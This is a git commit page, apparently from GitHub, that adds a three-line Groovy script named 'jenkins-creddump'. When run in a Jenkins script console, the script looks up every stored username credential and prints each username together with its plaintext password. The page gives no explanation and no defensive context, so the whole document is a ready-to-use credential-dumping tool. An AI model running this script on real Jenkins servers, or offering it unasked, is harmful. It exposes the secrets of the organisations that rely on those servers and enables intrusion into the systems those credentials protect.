Create jenkins-creddump.gy

This commit is contained in:
dade 2019-04-09 00:04:02 -07:00 committed by GitHub
parent 38017bccd8
commit 56e2add475
No known key found for this signature in database
GPG Key ID: 4AEE18F83AFDEB23

View File

@ -0,0 +1,3 @@
def creds = com.cloudbees.plugins.credentials.CredentialsProvider.lookupCredentials(
com.cloudbees.plugins.credentials.common.StandardUsernameCredentials.class, Jenkins.instance, null, null);
for (c in creds) { println(c.username + " : " + c.password )}